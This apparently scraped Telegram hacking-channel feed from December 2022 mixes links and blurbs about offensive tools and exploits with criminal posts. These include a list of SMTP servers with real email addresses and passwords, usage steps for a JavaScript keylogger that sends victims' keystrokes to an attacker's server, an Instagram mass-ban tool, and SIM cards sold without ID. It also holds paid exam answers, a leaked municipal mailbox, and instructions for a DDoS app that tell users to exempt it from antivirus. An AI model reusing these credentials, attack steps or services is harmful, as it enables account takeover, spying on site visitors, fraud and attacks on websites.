🔥Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.
2022-12-19 16:06:54
​BlueTeam.LabThis project contains a set of Terraform and Ansible scripts to create an orchestrated BlueTeam Lab. The goal of this project is to provide the red and blue teams with the ability to deploy an ad-hoc detection lab to test various attacks and forensic artifacts on the latest Windows environment and then to get a 'SOC-like' view into generated data.https://github.com/op7ic/BlueTeam.Lab#blueteam #techniques #cybersecurity #infosec
2022-12-19 14:12:22
https://youtu.be/YJub3MFbSZ0
2022-12-19 10:18:19
Application Security Engineer, БанкЗП: 130-200 тыс.руб. netЛокация: Москва, КраснодарФормат работы: удаленно/офисЧем предстоит заниматься:- Внедрение, настройка и поддержка WAF, реагирование на атаки;- Проведение анализа безопасности разрабатываемого программного обеспечения и его архитектуры, выявление уязвимостей;- Формирование требований безопасности в проектной деятельности Банка;- Осуществление контроля устранение обнаруженных уязвимостей.Мы ожидаем от кандидата: - Опыт настройки и внедрения систем класса web application firewall (WAF); - Знание и понимание OWASP Top 10, применимых методологий, стандартов и практик в области безопасной разработки; - Понимание принципов работы современных веб-приложений (XML-RPC, REST, SOAP, SOP, CORS, HSTS, CSP, OAuth2, и др.); - Знание OS Linux на уровне администратора. - Понимание принципов защиты веб-приложений и умение исправлять найденные уязвимости на архитектурном уровне;Большим преимуществом будет: - Знание SQL, базовые навыки работы в различных СУБД; - Базовые навыки программирования на каком либо языке (python, php, go и т.п.).Контакт: @alya_988‌‌Translation: ru-enApplication Security Engineer, BankSalary: 130-200 thousand rubles. netLocation: Moscow, KrasnodarWork format: remotely/officeWhat is to be done:- Implementation, configuration and support of WAF, response to attacks;- Conducting a security analysis of the developed software and its architecture, identifying vulnerabilities;- Formation of security requirements in the Bank's project activities;- Monitoring the elimination of detected vulnerabilities.We expect from the candidate: - Experience in setting up and implementing web application firewall (WAF) class systems; - Knowledge and understanding of OWASP Top 10, applicable methodologies, standards and practices in the field of secure development; - Understanding the principles of modern web applications (XML-RPC, REST, SOAP, SOP, CORS, HSTS, CSP, OAuth2, etc.); - Knowledge of OS Linux at the administrator level. - Understanding the principles of protecting web applications and the ability to fix vulnerabilities found at the architectural level;The big advantage will be: - Knowledge of SQL, basic skills in various DBMS; - Basic programming skills in any language (python, php, go, etc.).Contact: @alya_988‌‌
2022-12-19 05:28:33
💥Ban-R•Features:~Reports Time Delay To Secure Your Acc~Temp Ban & Permanent Ban ~Fully Safe & Accessible~Works Without Proxies ~Anti Virtual Machine •Use 2013 Insta Accounts For Fast BanningDownload Link: Click Here 👈Password: #CyberRatsBanRBy Cyber_Rats ❤️
2022-12-19 03:09:18
#tools#Offensive_security1. Venom - library that meant to perform evasive communication using stolen browser sockethttps://github.com/Idov31/Venom2. Pingoor - Linux Backdoor based on ICMP protocolhttps://github.com/MrEmpy/Pingoor
2022-12-19 03:09:17
#Malware_analysis1. Munin - Online hash checker for Virustotal and other serviceshttps://github.com/Neo23x0/munin2. Hunting for Attestation Signed Malwarehttps://www.mandiant.com/resources/blog/hunting-attestation-signed-malware
2022-12-18 14:32:32
https://youtu.be/8CKzTEZB9jQ
2022-12-18 13:39:14
🔥Venom is a C++ library that is meant to give an alternative way to communicate, instead of creating a socket that could be traced back to the process, it creates a new "hidden" (there is no window shown) detached edge process (edge was chosen because it is a browser that is installed on every Windows 10+ and won't raise suspicious) and stealing one of its sockets to perform the network operations.The benefit of creating a detached browser process is that there is no danger that it will be closed accidentally by the user and the sockets exist but not communicating with any site, therefore avoiding possible collisions.
2022-12-18 13:02:21
#tools#Offensive_security1. A simple ptrace-less shared library injector for x64 Linuxhttps://github.com/namazso/linux_injector2. EDRs Hooked APIshttps://github.com/vysecurity/EDRs
2022-12-18 10:59:51
#exploit1. CVE-2022-41050:A vulnerability in the MS Windows' User-Mode Printer Drivershttps://ssd-disclosure.com/win32k-user-mode-printer-drivers-startdoc-uaf2. CVE-2022-46689:macOS Dirty Cow bughttps://github.com/zhuowei/MacDirtyCowDemo
2022-12-18 10:59:50
#Research"First, Do No Harm: Studying the manipulation of security headers in browser extensions", 2021.]-> Fast JavaScript parser: https://github.com/acornjs/acorn
2022-12-18 10:59:49
#Malware_analysis1. VidarStealer analysishttps://github.com/m4now4r/VidarStealer2. Monster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC/Cobalt Strikehttps://isc.sans.edu/diary/Monster+Libra+TA551Shathak+pushes+IcedID+Bokbot+with+Dark+VNC+and+Cobalt+Strike/28934
2022-12-18 09:26:11
Linux Hacking ToolsNessus– this tool can be used for Ubuntu hack, scan configuration settings, patches, and networks etc. it can be found at https://www.tenable.com/products/nessusNMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at https://nmap.org/SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at http://www-arc.com/sara/sara.htmlThe above list is not exhaustive; it gives you an idea of the tools available for Ubuntu hacking and hacking Linux systems.
2022-12-18 03:01:24
💉linux_injector is a simple ptrace-less shared library injector for x64 Linux(Most Linuxes that use glibc should be supported).For control flow hijacking, this program needs a hijacking candidate. The code presented here uses malloc(), this can be changed by editing FUN_NAME and recompiling. Make sure the hooked function can run under 100ms, so that it won't be overwritten while it executes. This means calls like sleep or wait are bad candidates for the initial shellcode. The function in question also needs to be more than 0x50 long for the shellcode not to overwrite other functions.Usage:linux_injector <pid> <module>Where pid is target process id & module is a module to inject, will be dlopened in the remote process ⚠️The code expects that the target uses the same libc as available to us. If it does not, then the remote symbols won't be found. This could be fixed by reading the remote libraries and scanning for our symbols in them.
2022-12-18 03:01:23
💥MacDirtyCowDemo#macOS #XNU #vulnerability #exploitation #security #DirtyCOW #MacDirtyCow #root #su
2022-12-17 16:29:16
New mini shell :)⚠️ Bypass All waf📌 Non Encoded :::)))
2022-12-17 15:45:08
⚠️Anyone who wants cyber security intelligent program hacking  related post can make me admin on their channel or group.  Post uploading will be done only in the channel group above 500 over subscribers. ⚠️ @hayper007 ⚠️
2022-12-17 13:18:13
https://youtu.be/hyEU2YxjgYk
2022-12-17 05:17:05
#Threat_Research1. Unusual Cache Poisoning between Akamai and S3 bucketshttps://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s32. HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encodinghttps://hackerone.com/reports/1665156
2022-12-17 05:17:04
#exploit1. CVE-2022-28672:Foxit PDF Reader - UaF RCE Exploithttps://hacksys.io/blogs/foxit-reader-uaf-rce-jit-spraying-cve-2022-28672]-> https://github.com/hacksysteam/CVE-2022-286722. CVE-2022-45451:Acronis Cyber Protect/Home Cyber Protect - Arbitrary File Readhttps://github.com/alfarom256/CVE-2022-45451
2022-12-17 02:35:20
@hayper007
2022-12-17 02:27:11
🔥PingPlant is a Linux implant PoC that starts a custom listener for ICMP data, and parses the ethernet frame to check for a special payload.If this payload is found, it will then initiate a callback to a defined IP. Even though I have this connect back with a reverse shell, you could edit this to have it execute anything on the infected system when the special payload is received. Features:💾Runtime process renaming💾No listening ports💾Written in Go, so almost all AV's will never pick this up
2022-12-17 02:27:10
🔥Win32k User-Mode Printer Drivers StartDoc UAF(PoC included)A vulnerability(CVE-2022-41050) in the way BoundClipRGNToSurface merges surfaces allows attackers to trigger a UAF due to a function that frees the used data and then access it. If the memory where the freed memory is properly prepared, the attacker can control the crash and cause it to execute arbitrary code.
2022-12-17 02:27:09
🛡Akamai’s Perspective on December’s Patch Tuesday 2022In this report, we’ll assess how critical the vulnerabilities really are and how commonplace the affected applications and services are, and we’ll provide a realistic perspective on the bugs that were fixed.🛡December 2022 Patch Tuesday: 10 Critical CVEs, One Zero-Day, One Under Active Attack(crowdstrike)🛡Microsoft Patch Tuesday for December 2022 — Snort rules and prominent vulnerabilities(talos intelligence)🛡The December 2022 Security Update Review(ZDI)🛡Microsoft’s December 2022 Patch Tuesday Addresses 48 CVEs(tenable)🛡Microsoft Patch Tuesday, December 2022 Edition(KrebsonSecurity)🛡Patch Tuesday - December 2022(rapid7)
2022-12-16 15:05:00
https://youtu.be/Tr2OQgDPdw8
2022-12-16 13:45:20
На Source Zero Con 2022 представили данный инструмент. Если кратко: кидаете скомпилированный бинарь, тулза из бинаря убирает известные IoC строки, подписывает сертом из другого бинаря, ну и помогает EDR обходить (за счёт увеличения размера файла)https://github.com/optiv/Mangle#redteam #pentest #bypass
2022-12-16 13:45:19
🔥String Obfuscation The Malware Way - blog postWhile this technique is not as secure as encryption, it can still be useful for malware authors who want to avoid detection by simple string analysis and other static analysis techniques. Not encrypting or encoding the strings will also help avoid entropy-based detections.💥MurkyStrings is a string obfuscator for .NET applications, built to evade static string analysis. It does not rely on encryption or encoding to evade entropy-based detections. Instead, it transforms strings into a murky mess by inserting special characters and random words. Removing them again on runtime.Usage:MurkyStrings.exe <file path> [--mode=<mode>]Available modes:💾replace[glyph] - Insert a variety of homoglyph characters that look identical to alphabetical characters💾replace[simple] - Insert random amounts of a special character in between all actual characters💾combine[glyph] - Combines remove and replace[glyph]💾combine[simple] - Combines remove and replace[simple]
2022-12-16 13:45:15
🔓Defeating Windows ASLR via low-entropy shared libraries in 2 hoursAs it was demonstrated in this article, ASLR implementation on Windows has important nuances and in some situation can introduce additional risk for an application, especially if the target is a 32-bit program or it is linked with a library which was compiled without /HIGHENTROPYVA and /LARGEADDRESSAWARE flags. While the best solution would be to have per-execution randomization as it is done in Linux and modern MacOS, the good decision would be to move away from 32-bit to 64-bit applications and avoid linkage with shared libraries compiled without /HIGHENTROPYVA and /LARGEADDRESSAWARE flags. This would help to significantly increase complexity of an attack.
2022-12-16 13:45:14
⌨️Javascript Keylogger can come handy in case you are able to access only DOM/JS of a website and want to get naughty.Usage:💾change url variable in keylogger.js to url address where keylogger.php is located💾load keylogger.js in the DOM of the attacked application💾put keylogger.php and data.txt to your server where you have data write access (don't forget to set pertinent file privileges).💥Profit! You're done, just let the victim come to attacked website with JS allowed in the browser and type something.
2022-12-16 13:45:12
🔥CVE-2021-43444 to 43449: Exploiting ONLYOFFICE Web Sockets for Unauthenticated RCE.
2022-12-16 13:45:11
🔥🔥🔥Foxit PDF Reader UAF RCE Exploit JIT Spraying(CVE-2022-28672) - blog post.This research shows that if Foxit Reader had been compiled with CFG support, the discovered bug would have been more difficult to exploit. However, the lack of CFG support allowed the attacker to use JIT spraying to bypass existing mitigations such as ASLR and DEP. This highlights the importance of using multiple layers of defense to protect against attacks.💥PoC Exploit📺Demo: Foxit PDF Reader RCE Demo - CVE-2022-28672
2022-12-16 11:19:40
PLS REPORT THIS PEDO GROUPhttps://t.me/secret_s0ciety
2022-12-16 08:06:07
🌐 Cooprudea.comip, ip_long, user_login, user_id, stamp, activity, session_id, country, details, ac_bot, ac_status, ac_by_user email_to, subject, content, sender_name, sender_email, debug_mode, debugging_output, timestamp, status📣
2022-12-16 05:26:08
#Infographics#Offensive_securityDACLs (Active Directory Discretionary Access Control Lists) abusehttps://www.thehacker.recipes/ad/movement/dacl
2022-12-16 05:26:07
#tools#Red_Team_Tactics1. Talon - password guessing tool that targets the Kerberos/LDAP services within the Windows AD environmenthttps://github.com/optiv/Talon2. Bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attackhttps://hackerone.com/reports/16566273. Tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugshttps://github.com/binderlabs/DirCreate2System
2022-12-16 05:26:06
#cryptographyComparison of Symmetric Encryption Methodshttps://soatok.blog/2020/07/12/comparison-of-symmetric-encryption-methods
2022-12-16 05:26:05
#tools#Offensive_security1. udhcpc process crash on BusyBox 1.24.2https://research.nccgroup.com/2022/12/12/klee-for-the-cve2. Signing-key abuse and update exploitation frameworkhttps://github.com/kpcyrd/sh4d0wup3. A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methodshttps://github.com/p0dalirius/Coercer
2022-12-16 05:26:04
#exploit1. CVE-2022-45771:Pwndoc LFI to RCEhttps://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE2. Discord Image Token Password Grabber Exploithttps://github.com/bluewolf2778/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022
2022-12-16 05:25:13
#reversing#IoT_SecurityHow to Identify a Microcontroller Model Using Firmware Analysishttps://www.apriorit.com/dev-blog/787-reverse-engineering-microcontroller-model-identification
2022-12-15 16:06:51
🔥Windows Contacts(примеры использования Windows Contact API ) RCE vuln(CVE-2022-44666)⚠️Проблема(эта уязвимость покрывает не полностью проблему) не до конца исправлена, так что и подробности в виде рецензии от мелкомягких отложена на неопределенный срок!
2022-12-15 16:06:30
🔥You’ve Crossed the Line — Disturbing a Host’s RestAkamai Security Research dove deeply into MS-RPC research this past year. For a protocol that does so much, MS-RPC is largely under-researched, and it can have real-world effects. One of those effects is that vulnerabilities in an RPC interface become exposed. This is what we are focusing on in this blog post: vulnerabilities within the Local Session Manager (LSM) RPC interface. 🔥cve-2022-37973 PoC Exploit 🔥cve-2022-37998 PoC Exploit🧰RPC Toolkit(set of tools, articles, blog posts and links to help security researchers drive their RPC research)
2022-12-15 16:06:09
🔥Dragnmove is a post-exploitaition tool that infects files shared between users in order to move from one system to another. Dragnmove can detect actions like dropping a file into the browser window or attaching a file to an email client. After Dragnmove detects the action, it hooks CreateFile API calls to modify handles.
2022-12-15 15:02:52
https://youtu.be/ijMeVevV61Q
2022-12-15 15:02:12
Free SMTP mail.lifechangingfaith.com:587 angeliapelham@lifechangingfaith.com pelhamiamcigar.com:587 info@iamcigar.com ebxuo3Kbdsprecision.net:587 hr@dsprecision.net dongsung123smtp.netvigator.com:465(SSL) man1704@netvigator.com co386038sidehustleapps.com:587 martin@sidehustleapps.com PukeHigh@18rems.edu.gh:587 beatrice.atanga@rems.edu.gh atanga1ingoanews.com:587 advertisement@ingoanews.com Anil$4959joystickmd.com:587 sgalvez@joystickmd.com sejoco1970agenciacamaleao.com:587 11bets@agenciacamaleao.com lucro123webmail.rednosefoundation.org:587 dedi@rednosefoundation.org dedi123webdesign.com.py:587 lisa@webdesign.com.py lzfg2501wisecowconsultants.com:587 kartik@wisecowconsultants.com Wisecow!23brandm3dia.com:587 alex@brandm3dia.com brandmediaonwardpaper.com:587 chikamadu@onwardpaper.com chika2017smtp.rucapanel.com.ar:587 presupuestos@rucapanel.com.ar Presupuestos12019akc.mx:587 juridico@akc.mx Akc.2021eaaconsultores.cl:587 fbarros@eaaconsultores.cl Francisca2022gospectrumweb.com:587 support@gospectrumweb.com Gsw28844$smtp.terra.com.br:587 tataisant@terra.com.br 250289amgesolar.com.br:587 rhuan@amgesolar.com.br amg123cetaenergy.com:587 t.thompson@cetaenergy.com t.thompsonsmtp.kingwoodcable.com:587 collins3@kingwoodcable.com 12345smtp.kingwoodcable.net:587 kmljersey@kingwoodcable.net Fatala1
2022-12-15 14:54:23
50 SMTP free Join VIP now $35 get smtp everyday. SMTP Stock 800+
2022-12-15 13:19:20
71 Python Projects with reference and source code.
2022-12-15 11:27:20
Hazir olun :)
2022-12-15 10:35:44
http://tor.taxihttps://tor.taxi/journal
2022-12-15 03:19:46
Заканчиваем хит-парад маленьких городов Бурштынским городским советом. В архиве стандартно почта. Скоро будут базы. Честно‌‌Translation: ru-enWe finish the hit parade of small towns with the Burshtyn City Council. The archive is standard mail.Bases coming soon. Honestly‌‌
2022-12-15 02:23:58
Sim available without proof all sim reacharged 500/rs 1sim vodafone +91+ delivery charges600/rs 1sim jio +91+ delivery charges35sim Stock available 100% trusted escrow accepted@hayper007
2022-12-14 15:39:13
#Research"DISTDET: A Cost-Effective Distributed Cyber Threat Detection System", 2022.
2022-12-14 15:39:04
#tools#Offensive_security1. Nightly builds of common C# offensive toolshttps://github.com/Flangvik/SharpCollection2. Nemo - An offensive Remote Access Tool & Post-Exploitation Frameworkhttps://github.com/CompeyDev/nemo
2022-12-14 15:39:03
#Fuzzing1. Fuzzing ping(8)… and finding a 24 year old bughttps://tlakh.xyz/fuzzing-ping.html2. Finding JIT Optimizer Bugs using SMT Solvers and Fuzzinghttps://www.pypy.org/posts/2022/12/jit-bug-finding-smt-fuzzing.html3. Fuzzing the Shield: CVE-2022-24548https://medium.com/s2wblog/fuzzing-the-shield-cve-2022-24548-96f568980c0
2022-12-14 15:25:50
https://youtu.be/xpjjk1fxwXE
2022-12-14 15:01:23
https://github.com/CScorza/OSINTAnonimus
2022-12-14 09:09:17
I Can Help You To Clear & Give the training & exam solutions on the below certifications1_CEH.2_CEH Practical.3_eJPT.4_eCCPTv2. 5_eWPT. 6_eWPTxv2.7_CRTP. 8_CRTO. 9_OSCP. 10_OSWE.11_OSEP. 12_OSWP. 13_CPENT 14_CHFI15_eCPTxv216_PNPT17_Burpsuite exam Remote Exam Support possible. If anyone needs message me.Lower prices & passing guaranteed!Follow: https://t.me/alexserviceezPing @examsolutionzWe have added new exam of burpsuite solutions
2022-12-14 04:50:52
🇮🇷 Iranian rap about corrupt actors who are in the position of spiesBased on observations in Iran, there are actors who are willing to sell their homeland for money and spy for other countries.This issue has made the people of Iran very angry with some famous actors.It is expected that the Iranian government will take care of the request of its people and deal seriously with these spies.via "shabzadeh".#Celebrity_2zari #Green_card #Iranian_rap@YourJiniNews
2022-12-14 03:26:31
⚡️disBalancer App FAQWhat is happening⁉️We target Russian propaganda websites and sources that contribute to the Russian invasion of Ukraine. We want to make all the murders and violence caused by Russian military forces STOP. Troops are washing their hands in blood, killing the Ukrainians, both children and civilians. PLEASE, SHARE THE LINK ON THE APP AND LET’S #stopPutin TOGETHER!THE MORE PEOPLE RUN THE APP, THE MORE EFFECTIVE ATTACKS ARE!How to use the app⚫️ Download the file via https://mega.nz/file/Mu50kBTT#RYZWGZyx-VgPYj_T4xZ07Uh976wvQP20KvYMpKaahEo⚫️ Unzip it ⚫️ Open the disBalancer app and click RUN That's it! You're in the cyber army 💪🏼Update! ‼️We are upgrading server (more resources = more people involved), if you will receive 500 error message or heartbeat error - don't worry, your soft still attacking and working!Minimal system requirements1) To run the application you need to have a .Net runtime version 4.5.2+ (higher version as 4.8 also would fit) https://dotnet.microsoft.com/en-us/download/dotnet-framework2) If you have problems with restart, the last package Microsoft Visual C++ 2015 2019 Redistributable (x64 x86) will solve it. https://docs.microsoft.com/en-us/cpp/windows/latest-supported-vc-redistIs it possible to use the App on Mac OS or Linux?Our application is currently launched for Windows. Apps for other OS are on the way and will be announced soon. You can install and run the app on Mac OS and Linux using Boot Camp, VMWare, or Parallels Fusion. Antivirus exclusionsTo avoid any runtime problems until the app will be signed: Add the application folder to your antivirus exclusions to avoid blocking task execution, as some antiviruses could detect it as a hacker tool. Adding an application to the firewall exception would be also a good idea. The app isn’t server-based, it’s a simple client, so you don’t need to be aware of the hacking of the exposed web interface and host. Can I use VPN?It’s not required to use VPN to run the app but you can use it to provide your data encryption. VPN services are recommended:https://hackenvpn.comhttps://1.1.1.1https://hide.me/What to do if the error occurs?Be sure you have installed all required software described in minimal system requirements. In case of any issues with the application, please write #Error in the chat and attach the information.log file. It’s a file located near Disbalancer.exe. How do we know what targets we have? We don’t disclose targets until downtime. Targets that are currently under attack are hidden due to security purposes. After a website is in downtime, we send an inactive link to the disBalancer chat. Can I see the code?Unfortunately, we haven't done that yet due to the beta testing period. There are some things that we can't publish at all as well. For instance, hidden attack mechanics and algorithms, transfer batching, and time synchronization that make it possible to function normally. Can I share websites to make them unusable?Sure! Just send a link to it on our Telegram chat and add the hashtag #NewTarget.disBalancer UKRAINE 🇺🇦Since this chat was created for an English-speaking audience, we ask all Ukrainians to go to this chat for comfortable communication for everyone.Instruction in Ukrainian: https://telegra.ph/%D0%86nstrukc%D1%96ya-vstanovlennya-Disbalancer-dlya-DDOS-atak-na-sajti-rusn%D1%96-02-26
2022-12-13 14:52:51
https://youtu.be/n-aqF7glm28
2022-12-13 03:12:41
#Infographics#Infosec_StandardsTypes of VPN]-> RFC4026: "Provider Provisioned VPN Terminology", 2018.https://datatracker.ietf.org/doc/rfc4026
2022-12-13 03:12:38
#reversing#ResearchBlackHat Europe 2022:"Exploring a New Class of Kernel Exploit Primitive".
2022-12-13 03:12:37
#exploit1. CVE-2022-45025:Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)https://github.com/yuriisanin/CVE-2022-450252. Exploring Chrome’s CVE-2020-6418https://blog.haboob.sa/blog/exploring-chromes-cve-2020-6418-part13. CVE-2022-39066:SQL Injection Vulnerability in ZTE MF286Rhttps://github.com/v0lp3/CVE-2022-39066
2022-12-13 03:12:36
#exploit1. ThinkPHP latest RCE reproduction and analysishttps://xz.aliyun.com/t/119402. Folina, Shadow Credentials, and WSUS exploitationhttps://0xdf.gitlab.io/2022/12/10/htb-outdated.html3. CVE-2022-1361:Improper Neutralization of Special Elements Used In a SQL Command: New Technique Discovered To Bypass WAF Of Several Vendorshttps://gbhackers.com/bypass-web-application-firewalls/amp
2022-12-13 03:12:35
#Offensive_security1. A collection of various and sundry code snippets that leverage .NET dynamic tradecrafthttps://github.com/bohops/DynamicDotNet2. Payload generator to exfiltrate user cookies through the PHP info page bypassing the HttpOnly flag during XSS exploitationhttps://github.com/HackCommander/PHP-info-cookie-stealer3. From SQL Injection to RCE on Intel DCM (CVE-2022-21225)https://www.rcesecurity.com/2022/12/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225
2022-12-13 03:12:34
#compilersCodon - high-performance, zero-overhead, extensible Python compiler using LLVMhttps://github.com/exaloop/codon
2022-12-13 03:12:33
#Red_Team_Tactics1. StealthHook - A method for hooking a function without modifying memory protectionhttps://www.x86matthew.com/view_post?id=stealth_hook2. Frida script to bypass common methods of sslpining Androidhttps://gist.github.com/incogbyte/1e0e2f38b5602e72b1380f21ba04b15e3. pipe_buffer arbitrary read writehttps://interruptlabs.co.uk/labs/pipe_buffer
2022-12-13 03:12:32
#exploit1. Exploiting CVE-2022-42703 - Bringing back the stack attackhttps://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html2. CVE-2022-36537:ZK Framework - Exposure of Sensitive Information to an Unauthorized Actorhttps://github.com/agnihackers/CVE-2022-36537-EXPLOIT
2022-12-12 14:41:29
https://youtu.be/yrWj8VWovkU
2022-12-12 13:06:08
Fuzzing ping(8)…and finding a 24 year old bughttps://ift.tt/z5ORFPVSubmitted December 11, 2022 at 09:57AM by Gallusvia reddit https://ift.tt/kyRpCqZ
2022-12-06 03:04:38
#hardening"Hardening with Scapolite: a DevOps-based Approach for Improved Authoring and Testing of Security-Configuration Guides in Large Scale Organizations", 2022.
2022-12-06 03:04:37
#Tech_book"Finding Beacons in the Dark: A Guide to Cyber Threat Intelligence", 2022.
2022-12-06 03:04:36
#reversing"Exploiting Branch Target Injection", 2021.
2022-12-06 03:04:18
#Malware_analysisAnti-Reversing Techniques Part 1: https://infosecwriteups.com/anti-reversing-techniques-part-1-3200db42f1e3Part 2: https://infosecwriteups.com/anti-reversing-techniques-part-2-bd5e0d3cd7aa
2022-12-06 03:04:17
#Tech_book"Black Hat Python: Python Programming for Hackers and Pentesters, 2nd Edition", 2021.]-> Python 3 Source Code:https://github.com/EONRaider/blackhat-python3
2022-12-06 03:04:16
#Threat_Research#Blue_Team_Techniques1. Threatest - CLI and Go framework for end-to-end testing threat detection ruleshttps://github.com/DataDog/threatest2. Detect Tactics, Techniques & Combat Threatshttps://github.com/rabobank-cdc/DeTTECT
2022-12-06 03:04:15
#Malware_analysis1. ₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malwarehttps://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware2. Blowing Cobalt Strike Out of the Water With Memory Analysishttps://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis
2022-12-05 20:33:20
#Research"HearMeOut: Detecting Voice Phishing Activities in Android", 2022.]-> Voice phishing behavior detection system in AOSP:https://github.com/WSP-LAB/hearmeout
2022-12-05 20:32:11
https://github.com/Eltion/Facebook-SSL-Pinning-Bypass
2022-12-05 09:22:56
https://www.softwaretestinghelp.com/best-laptop-for-hacking/
2022-12-05 08:26:31
Titan: A generic user defined reflective DLL for Cobalt Strikehttps://github.com/SecIdiot/titanA simple PoC to invoke an encrypted shellcode by using an hidden callhttps://github.com/enkomio/BrokenFlowlaZzzy is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniqueshttps://github.com/capt-meelo/laZzzya small wiper malware programmed in c#https://github.com/IntelBroker/Endurance-WiperDiscover new target domains using Content Security Policyhttps://github.com/edoardottt/cspreconVillain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a teamhttps://github.com/t3l3machus/VillainPassively collect assets and automatically perform SQL injection detection (plug-in automatic Bypass), XSS detection, RCE detection, and sensitive information detectionhttps://github.com/ExpLangcn/EPScanSharpUserIP: Extract the login log on the domain controller or remotely, and quickly obtain the IP address corresponding to the domain userhttps://github.com/lele8/SharpUserIPScrapPY: a Python utility for scraping manuals, documents, and other sensitive PDFs to generate wordlists to perform brute force, forced browsing, and dictionary attacks. Updated with word frequency analysis!https://github.com/RoseSecurity/ScrapPYFirebaseExploiter is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testinghttps://github.com/securebinary/firebaseExploiter
2022-12-05 08:25:45
Shennina Automating Host Exploitation with AIhttps://github.com/mazen160/shenninaBOF-pack-1 A care package of useful bofs for red team engagmentshttps://github.com/jsecu/BOF-pack-1SpyGuard is a forked and enhanced version of TinyCheck. SpyGuard's main objective is to detect signs of compromise by monitoring network flows transmitted by a devicehttps://github.com/SpyGuard/SpyGuard
2022-12-03 17:06:53
​⚜ List of Websites Giving free RDP/VPS ⚜🌀 http://vpswala.org/🌀 http://ohosti.com/vpshosting.php🌀 https://gratisvps.net/🌀 https://my.letscloud.io/sign-up/🌀 https://developer.rackspace.com/🌀 https://www.vultr.com/🌀 https://www.ionos.com/🌀 https://www.cloudsigma.com/🌀 https://www.digitalocean.com/🌀 http://ezywatch.com/freevps/🌀 https://yellowcircle.net/🌀 https://www.ctl.io/free-trial/🌀 https://www.ihor.ru/🌀 https://www.neuprime.com/l_vds3.php🌀 https://www.skysilk.com/🌀 https://sadd.io/🌀 https://www.apponfly.com/en/
2022-12-03 13:13:17
2FA Bypass by @hackerscrolls
2022-12-02 21:53:44
https://github.com/HASH1da1/Gotanda
2022-12-02 21:53:43
https://github.com/mitchellkrogza/Phishing.Database
2022-12-01 18:59:00
#Research"Backporting Security Patches of Web Applications: A Prototype Design and Implementation on Injection Vulnerability Patches", 2022.
2022-12-01 18:58:57
#Fuzzing"SnapFuzz: An Efficient Fuzzing Framework for Network Applications", 2022.]-> https://google.github.io/clusterfuzz/#trophies
2022-12-01 18:58:56
#Malware_analysis1. New details on commercial spyware vendor Varistonhttps://blog.google/threat-analysis-group/new-details-on-commercial-spyware-vendor-variston2. HiveV5 file decryptor PoChttps://github.com/reecdeep/HiveV5_file_decryptor
2022-12-01 18:56:41
#Cloud_SecurityA Detailed Talk about K8S Cluster Security from the Perspective of AttackersPart 1: https://tutorialboy24.blogspot.com/2022/08/detailed-talk-about-k8s-cluster.htmlPart 2: https://tutorialboy24.blogspot.com/2022/09/a-detailed-talk-about-k8s-cluster.html
2022-12-01 18:56:40
#Blue_Team_TechniquesGet-InjectedThreadEx - Detecting Thread Creation Trampolineshttps://www.elastic.co/security-labs/get-injectedthreadex-detection-thread-creation-trampolines]-> PowerShell detection script:https://github.com/jdu2600/Get-InjectedThreadEx
2022-12-01 18:56:39
#reversingGuide to Reversing and Exploiting iOS binariesPart 3 - Heap Overflows on iOS ARM64: Spraying, UAFhttps://www.inversecos.com/2022/07/heap-overflows-on-ios-arm64-heap.html]-> Part 1, 2:
2022-12-01 18:56:38
#tools#OSINTCVE and PoC SearchBot v.0.3.5:- search and monitoring of new CVE;- search and monitoring of PoCs.
2022-12-01 18:56:37
#tools#Sec_code_reviewHeap_detective - detect heap memory pitfalls in C++/Chttps://github.com/CoolerVoid/heap_detective
2022-12-01 18:56:35
#DFIREmotet Strikes Again - LNK File Leads to Domain Wide Ransomwarehttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware
2022-12-01 13:16:15
Bypassing Web Application Firewallshttps://ift.tt/ad0kRiLSubmitted December 01, 2022 at 04:51PM by ma-nivia reddit https://ift.tt/fH8D37r
2022-12-01 07:23:46
Race condition in snap-confine's must_mkdir_and_open_with_perms() (CVE-2022-3328) - SUID-root program installed by default on Ubuntuhttps://ift.tt/OvQHKgXSubmitted December 01, 2022 at 07:23AM by Gallusvia reddit https://ift.tt/07bJkwg
2022-12-01 01:59:31
Exploiting an N-day vBulletin PHP Object Injection Vulnerabilityhttps://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injectionTHX #APTIran
2022-11-30 15:36:19
📕A Journey To Pwn And Own The Sonos One Speaker
2022-11-30 15:35:37
💥USA's Military Empire: A Visual Database Военные базы США распластались во многих частях Земли и это ни для кого не секрет, визуальная БД поможет понять визуально масштабы вмешательства вездесущей "Американской мечты" дерьмократии.#наЗлобуДня
2022-11-30 15:35:21
🔥Home Grown Red Team: Lateral Movement With Havoc C2 And Microsoft EDRLateral movement is extremely important for any red team engagement. Getting your initial shell is great, but if you can’t move off the box you could be dead in the water.
2022-11-30 09:09:04
Hive Ransomware v5-5.2 file decryption toolhttps://github.com/reecdeep/HiveV5_file_decryptor
2022-11-30 07:33:47
